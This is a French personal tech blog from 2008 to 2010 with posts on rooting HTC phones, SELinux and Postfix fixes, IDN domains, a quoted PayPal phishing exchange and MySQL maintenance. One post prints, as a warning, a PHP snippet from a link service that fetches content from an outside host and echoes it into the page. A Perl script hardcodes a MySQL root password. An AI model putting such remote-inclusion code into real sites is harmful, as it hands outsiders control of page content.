Blogger pour rien dire!

Aller au contenu | Aller au menu | Aller à la recherche

mercredi, juin 16 2010

Enfin rootable le correctif de sécurité 911 pour htc dream et magic!

Finallement, la communotée a réussi a trouver une méthode de rooter les HTC Magic qui ont été patché pour le fameux bug du 911 dont j'ai fait référence dernièrement. Je n'ai pas essayé étant donné que je n'ai pas vraiment été affecté par ce bug, mais la procédure est la et si vous en avez un que vous voulez rooter. Faite attention a ne pas faire une brick, il serait dommage de transformer un android en une vulguère brick.

En passant cm-5.0.8 va très bien les versions cyanogenmod sont très stable et il y a des updates très régulièrement .. froyo est pour bientot.

Lien expliquant comment installer cm-5.0.X

jeudi, mai 6 2010

Que faire quand il manque d'électricité

humm la vie sans internet n'a plus aucun sens, il y a eu une tempête et l'électricité a soudainement disparue. Heureusement j'ai une batterie sur mon ordinateur portable ainsi qu'un téléphone avec Android. En quelque secondes j'ai installé une application pour faire du tethering ... avec cela je partage le réseau wifi de mon charmant petit téléphone et ainsi utiliser la connexion 3G que mon fournisseur m'offre. Ah que c'est beau de pouvoir utiliser ces applications gratuite sur un téléphone dont j'ai le plein contrôle.

update eclair pour htc dream

En fin de semaine je me suis un peu ammusé avec mon android car vendredi j'ai vu qu'il y avait la version 2.1 ( eclair ) est disponible non seulement pour les utilisateur du NexusOne mais aussi pour les utilisateur du Dream et du Magic. Pour le dream il faut avoir le "danger-spl" afin de pouvoir l'installer.

Il faut dire que j'ai été chanceux dans mon timing avec Rogers pour mes téléphonnes. Ayant acheté le dream j'ai eu droit à un rehaussement gratuit pour le Magic. J'ai reçu ce Magic avant l'ultime crosse du bug 911. Ils ont décidé d'utiliser ce bug plusieurs mois plus tard pour locker avec un firmware pas encore rooté leurs nouveaux clients afin qu'ils ne puissent pas profiter de la beauté de l'open-source. Sincèrement, je trouve vraiment que la communoté en arrière de Cyanogenmod (www.cyanogenmod.com) est belle à voir aller. Beaucoup d'updates sur twitter qui nous disent comment avance le développement et ils nous offrent des version de firmware bien plus à jour que ce que notre fournisseur (Rogers) veut nous offrir.

Anyways, quand on est assez chanceux pour avoir un cell rooté rien de plus simple que de copier les 3 fichiers sur la carte SD et de les appliquer dans l'ordre suivent: update-cm-5.0.7-DS-test2-signed.zip, gapps-ds-ERE36B-signed.zip, bc-5.0.7-t2-ebi1_R2-signed.zip

Il est préférable de "wiper" le téléphonne si on arrive d'une version 4.2.X. Il reste encore des petit bugs mais ça reste dans mon cas très utilisable :)

mercredi, janvier 27 2010

Rogers Bug 911 mise à jour obligatoire

C'est à mon grand malheur que samedi passé je reçois un SMS de la part de Rogers me disant que je devrai nécessairement appliquer leur mise à jour obligatoire. Ayant rooté mon appareil, je me dit, ouf encore une magouille pour me rendre la tache encore plus compliquer pour rouler la version 1.6.

Je comprends très bien l'impact et la nécessité d'appliquer cette mise à jour qui corrige un bug relié aux appels acheminés au service 911 si on a le GPS d'activé. Pour forcer les gens à se mettre à jour ils ont décidé de désactiver le plan data a tout les détenteurs de HTC Dream ou Magic. Certain vont dire, mais ou est le lien avec le fucking GPS! L'application Google Maps utilise le GPS et va siphonner des données sur internet, donc ils ont jugé que si quelqu'un utilise le gps, il devra utiliser son plan data afin d'avoir une map qui contient des informations pertinentes. Donc en désactivant le data, les gens ne peuvent plus utiliser leur appareil comme un GPS dans la voiture ( ou dans mon cas à vélo ).

Personnellement j'ai un gros problème avec cette mise à jour car depuis septembre passé, la version 1.6 a corrigé ce bug... j'utilise et aime bien cette version comparativement à la version d'origine ( 1.5 ). Cette mise à jour va aussi Wiper tout les contact et applications sur le téléphone... style un FORMATTAGE! Je me retrouve face a une situation ambiguë, je dois contacter Rogers pour leur dire que j'ai pas appliqué la mise à jour et que j'ai aucune intention de l'appliquer, et que mon appareil n'est pas vulnérable à ce bug du 911 sans toute fois leur dire que j'ai rooté mon appareil. J'ai passé beaucoup de temps sur les forums de discutions à voir ce que les gens allaient faire.

Teteux comme je suis je les ai appelés à répétition pour qu'ils m'aident à mettre à jour mon appareil. Ils m'ont tous pris par la main afin que je me rende sur le site web avec la petite procédure. Une fois rendu sur la page, je leur dit que j'utilise Linux comme système d'exploitation et que j'ai pas accès a un ordinateur qui a windows peu importe la version, ni d'amis qui ont des mac. La c'est comique de les entendre patiner à se demander ce qu'ils vont faire. Finallement après avoir eu beaucoup de plaisir à engorger leur soutien technique, j'ai décidé de leur dire que j'ai repris mon vieux Nokia 6275i que j'avais chez bell mobilité... J'ai dit au gars du tech support que j'ai transféré ma sim dans mon ancien appareil que j'avais chez bell. Il a simplement fait son "network refresh" sans plus poser de questions.

Je suis content de la situation car j'ai mon accès a mon plan data, je ne suis pas vulnérable au cas ou je voudrait appeler le 911, et ce même si je suis entrain de jouer sur google maps avec mon gps.

Voici un lien intéressant sur le sujet

lundi, janvier 18 2010

Ah ces jeunes et la technologie!

Ça y est, mon fils est sur la bonne voie, déjà il sait comment utiliser le téléphone cellulaire! Il ne fait pas comme la plupart des enfants et le mettre dans sa bouche, il en fait une utilisation avancée. Il a réussi à le débloquer, ouvrir des applications, si au moins il savait écrire, il aurait pu envoyer un SMS à sa maman pour lui dire un petit COUCOU!

Faute de savoir écrire, il se débrouille merveilleusement bien dans les menu. Il a même téléchargé une application sur le Market il trouvait que j'avais besoin d'installer seesmic! Avec cela je peux désormais, âce à mon fils, twitter sur n'importe quoi n'importe où! Que de plaisir en perspective!

OLYMPUS DIGITAL CAMERA
OLYMPUS DIGITAL CAMERA

mardi, janvier 12 2010

Mon premier petit bug de l'année 2010 selinux+postfix

Vendredi passé, j'applique diverses mises à jours, et ce matin je rentre au bureau avec la mauvaise surprise que tous mes serveurs qui utilisent le combo postfix et selinux en mode enforcing me causent de petits problèmes. Heureusement, aucun d'entre eux sont des serveur de courriel, ils ne font qu'envoyer divers rapports de tache cron.

Bref, ce matin j'ai fouillé un peu sur le bugzilla de redhat de redhat et j'ai trouvé un petit workaround. Rien de trop compliqué..

echo "test" |mail -s "test" root
send-mail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
send-mail: fatal: root(0): unable to execute /usr/sbin/postdrop -r: Success

yum install selinux-policy-devel

Créer un fichier mypostfix.te
vim /usr/share/selinux/devel/mypostfix.te

========CUT========
policy_module(mypostfix, 1.0)

gen_require(`
 type sendmail_t;
 type postfix_postdrop_t;
')

allow postfix_postdrop_t sendmail_t:unix_stream_socket { getattr read write ioctl };
==================

cd /usr/share/selinux/devel/; make -f Makefile
semodule -i mypostfix.pp

# On test que tout va bien.
echo "test" |mail -s "test" root

mercredi, décembre 16 2009

HTC Dream, je t'ai rooté!

Quoi de plus frustrant pour un linuxien de ne pas avoir le plein contrôle de son nouveau téléphone. J'ai passé de longues heures à analyser la situation, à lire sur les forums afin de trouver la méthode pour upgrader mon appareil et y installer tout plein de trucs cool qui ne sont pas supportés par mon telco.

Bref, je suis rendu à la version donut ( 1.6 ) d'android. L'interface est beaucoup plus rapide et intéressante. À ce que j'ai lu, il parait que c'est une augmentation des performances de l'ordre de 30% .. ce qui n'est pas négligeable. J'ai remarqué que ma batterie dure beaucoup plus longtemps depuis que j'ai changé le OS dans mon cell.

Pour les gens qui sont pris avec rogers et la version 1.5 d'android et qui désirent rooter leur appareil, sachant qu'il est possible de faire une brick avec celui-ci et par le fait même invalider la garantie que Rogers offre... J'ai un lien qui explique toutes les étapes nécessaires pour y arriver. Les fichiers sont un peu difficile à trouver, car ils ne restent jamais très longtemps sur les site de download. J'en ai une copie que je pourrai vous expédier avec grand plaisir si vous me le demandez mais je ne les mettrai pas en lienici.

Voici le lien en question qui explique tout ce qu'il faut faire pour rooter et passer à la version 1.6 de android.

Bonne chance

mardi, décembre 8 2009

Qui veux des invitations pour Google Wave!

J'ai une vingtaine d'invitations disponibles si jamais quelqu'un voulait tester la nouvelle plateform de travail collaboratif de google. Je ne l'ai pas vraiment essayé depuis que j'ai reçu mon invitation, mais je serais ravis d'en faire l'essai avec mes fidèle lecteur de mon blogue que je délaisse un peu trop. Les invitations iront premier arrivé premier servis, donc j'attends avec impatience vos commentaires!

jeudi, novembre 26 2009

Uptime de malade.

Je sais pas si je devrais être fier de ce uptime de fou ou bien m'en vouloir pour ne pas avoir patché le kernel et rebooté le serveur quelques fois depuis les 1191 dernier jours... J'ai juste été étonné de voir cela ce matin quand j'ai du me connecter pour re-rouler des cron du a une défaillance d'un commutateur.

4:19PM up 1191 days, 18:18, 1 user, load averages: 0.01, 0.02, 0.00

C'est beau de voir que les unix restent stable longtemps.

vendredi, juillet 31 2009

Nom de domaine accentués

Ça fait déjà un bon nombre d'années que l'on peut enregistrer des nom de domaines ayant des caractères accentués. Je ne m'étais pas encore décidé d'en acheter un et de voir comment le tout fonctionnait avant cette semaine. Suite à mon expérimentation qui ressemble plus a beaucoup de lecture sur l'algorithme punycode qui est utilisé pour représenter les caractères bizarre ou accentués en ASCII. J'ai songé à cela un peu et en tant que tel, pour nous les francophones notre alphabet est tellement proche de l'anglais que ça ne nous cause pas de réel problèmes.

Prenons comme exemple un site populaire qui s'appelle météomédia qui utilise meteomedia.com comme nom de domaine. Tout est beau, le nom est très proche de la réalité et souvent à l'école les gens écrivent des caractères accentués avec un simple barbeau qui rend cela difficile à déterminer si l'auteur voulait écrire un é è ë ê. Bref pour la langue française c'est mineur comme avantages mais pour les gens en Asie ou leur alphabet ne ressemble pas du tout à nous ça deviens d'autant plus intéressant d'avoir des IDN. ( Internationalized domain names )

Le problème que l'on rencontre c'est que depuis qu'un tata a décidé d'enregistrer ωωω.ραyραl.com ou un autre genre de déviation du nom original afin de faire du phishing. Les navigateurs firefox et IE ont décidé de ne plus afficher le nom avec les caractères internationales mais plutôt d'afficher le résultat punycodé ce qui est un peu ordinaire à mon avis.

Ex: www.là-bas.com deviens www.xn--l-bas-rqa.com

Pour m'amuser j'ai aussi créé ωωω.là-bas.com

Je dois avouer que la configuration au niveau des dns n'est vraiment pas évidente à relire... C'est pas que c'est compliqué à faire mais visuellement c'est pas évident à voir qu'est-ce qui est quoi. Même chose dans la config de apache :)


$ORIGIN xn--l-bas-rqa.com.

@       IN A    72.55.168.14
www     IN A    72.55.168.14
xn--byaaa       IN A 72.55.168.14


    ServerName www.xn--l-bas-rqa.com
    ServerAlias xn--l-bas-rqa.com xn--byaaa.xn--l-bas-rqa.com
 

Bref tout la mécanique est en place pour que ça soit fonctionnel et utilisable mais les navigateurs nous mettent indirectement un bâton dans les roues sous prétexte que c'est pour protéger les gens contre les arnaques. Je vous laisse songer à tout ça et j'attends vos commentaires que je lis toujours avec grand plaisir.

lundi, juillet 27 2009

un phisheur qui ne me réponds pas!

Je me demande pourquoi je n'ai pas de réponse. J'ai pourtant fait un reply sur le email provenant d'un imposteur voulant voler mon compte paypal. Si au moins il me répondais pour essayer de me convaincre qu'il travaille réellement chez paypal. Qui sait, je me ferais peut-être avoir!

----- Original message -----

MIME-Version: 1.0
Received: by 10.210.110.5 with SMTP id i5mr4607065ebc.3.1248455252108; Fri, 24
       Jul 2009 10:07:32 -0700 (PDT)
In-Reply-To: <20090724160425.20454.qmail@vps6579.managemyvps.com>
References: <20090724160425.20454.qmail@vps6579.managemyvps.com>
From: Charles Lacroix <charles.lacroix@gmail.com>
Date: Fri, 24 Jul 2009 13:07:12 -0400
Message-ID: <d86d67c10907241007j3c51309dxb7ff8078b22a11d1@mail.gmail.com>
Subject: Re: {Disarmed} Your account is limited
To: paypal@10484.ppsecure.com
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

dude i cannot go anywhere in your site except the "my account"
and any other link i click looks like it redirects me to "my account"

Are you trying to get my login informations and credit card number ?
I feal this isn't really comming from paypal, am i right ?

On Fri, Jul 24, 2009 at 12:04 PM, <paypal@10484.ppsecure.com> wrote:
> MailScanner has detected a possible fraud attempt from "66.11.239.194"
> claiming to be


  ----- End of message -----

vendredi, juin 19 2009

Quand yum fait des sienne ..

Quand vous vous absentez du travail et qu'à votre retour il y a une shitload de mises à jours à appliquer et que la commande yum update ne semble pas vouloir fonctionner comme on a l'habitude, il faut prendre les grand moyens!



yum clean all

ensuite on refait notre yum update et dans mon cas, le tour étais joué.

vendredi, mai 1 2009

Webmasterskit une arnaque pour les webmasters

Ce matin je me suis abonné à un site qui s'appelle http://www.webmasterskit.com/ et quand j'ai vu qu'ils voulaient que j'inclus un bout de code php dans mon site j'ai trouvé cela un peu bizarre. J'ai donc continué afin de voir le bout de code php. Je trouve cela très rigolo, et pour certain à première vue ça peut sembler inoffensif mais en réalité, vous leur donnez une porte grade ouverte pour exécuter à peu près n'importe quoi sur votre serveur. Bref méfiez vous des code à inclure dans vos sites web, surtout s'il s'agit de code coté serveur ( php/asp/python/perl et j'en passe )

<?php
@ini_set('allow_url_fopen',  1); 
@ini_set('default_socket_timeout',   3);
$path = "/code.php?id=58182&url=" 
    . urlencode($_SERVER['REQUEST_URI']) 
    . "&urlh=" . urlencode($_SERVER['HTTP_HOST']);
$fp = @fsockopen("www.linkpro.org", 80, $errno, $errstr, 3);
if($fp) {
    @fputs($fp, 
    "GET {$path} HTTP/1.0\r\nHost: www.linkpro.org\r\n\r\n");
	while (!feof($fp))
            $data .= @fread($fp, 8192);
	fclose($fp);
 	$page = explode("\r\n\r\n", $data);
    echo $page[1];
}?>

lundi, octobre 6 2008

38% des sites web ne servent à rien ...

Aujourd'hui en naviguant sur la TML ( Toile Mondiale Large ) je suis tombé sur cet article qui disais que 38% des sites web en .com et .net ne servent strictement à rien. J'ose espérer que ce blog ne tombe pas dans ce fameux 38%.

38% des sites web ne servent à rien ...

Pour ma part je possède quelques domaines qui servent strictement a rien d'autre que de cumuler du spam, voir quel genre d'attaques automatisé je reçois.

mercredi, octobre 1 2008

Petit truc pour vos binlog de mysql

Si vous êtes comme moi et que vous avec le binlog d'activé sur vos BD et que à chaque années il vous arrive de vous rendre compte que ça serait une bonne idée de purger une partie de ces logs mais que vous ne vous rappelez jamais comment, voici un petit truc que vous pouvez mettre dans votre planificateur de taches:


#!/usr/bin/perl 

use strict;
use warnings;
use DBI;

my $dbh = DBI->connect('DBI:mysql:', 'root', 'r00t')
    or die "Could not connect to mysql server: $DBI::errstr";

my $return = 
$dbh->do(
'PURGE MASTER LOGS BEFORE DATE_SUB(CURDATE(), INTERVAL 60 DAY)'
);

$dbh->disconnect();

vendredi, mai 9 2008

On parle de moi sur l'internet!

L'été passé j'ai fait plusieurs test au niveau de courrier électronique et mon choix pour le service de pop et imap s'est arrêté sur courier-imap pour 2 raisons. Il est en format Maildir ( tout comme dovecot ) et la deuxième raison est que mon boss connais bien la configuration de courier-imap, donc pour qu'on passe le fameux test de l'autobus c'était plus simple de cette façon la. Avec dovecot j'ai eu des problèmes lorsque je staquais les différent modules d'authentification pour une raison obscure ça plantais le service. Après quelques recherches je suis tombé sur le blog de Sébastien Wains il y avait effectivement presque tout ce que j'avais besoin, sauf que les rpm était fait pour l'architecture i386 or nous au travail avons des processeur amd64 bits. J'ai du les recompiler chose que je suis habitué de faire. J'aime avoir des packages bien fait, ça facilite beaucoup la gestion par après.

Bref, tout cela pour dire que aujourd'hui j'ai lancé la même recherche ayant oublié que j'en avais déjà produit pour trouver des packages rpm de courier-imap que j'ai fait l'été dernier sur son blog. C'est comique car il me remercie de les avoir produit. Je vais voir si je ne peux pas les remettre à jours et peut-être les héberger sur mon serveur ou les offrire a Dag Wieers.

http://www.wains.be/index.php/2007/08/14/courier-imap-rpm-for-centos-5-i386/

Fido propose un service unissant Wi-Fi et GSM

Enfin une compagnie de téléphonie qui commence a voir les biens fait de laisser leur utilisateurs profiter pleinement de leur appareils téléphonique.

Grâce à son nouveau service Uno, les clients de Fido peuvent utiliser leur appareil mobile à la maison grâce au Wi-Fi, à tarif fixe et sans limites d'utilisation.

mercredi, avril 30 2008

le macbook air pas très pratique après tout.

Voici un video youtube de la nouvelle publicité de IBM, ça démontre bien que le macbook air n'est pas si pratique que cela. Oui il est petit et léger mais est-ce que vous voulez vraiment faire autant de compromis?

mercredi, février 27 2008

Microsoft une gagne de cretin

C'est le fun quand on a le monopole, on peut enfreindre tout plein de loi et surtout ne pas payer nos amandes.
Microsoft ne paye pas ses amandes en Europe.

jeudi, février 21 2008

Microsoft veut des produits plus ouverts

Ouf, j'ai faillir en mourir de rire tantôt lorsque j'ai lu cette nouvelle:

Microsoft veut des produits plus ouvert

- page 1 de 3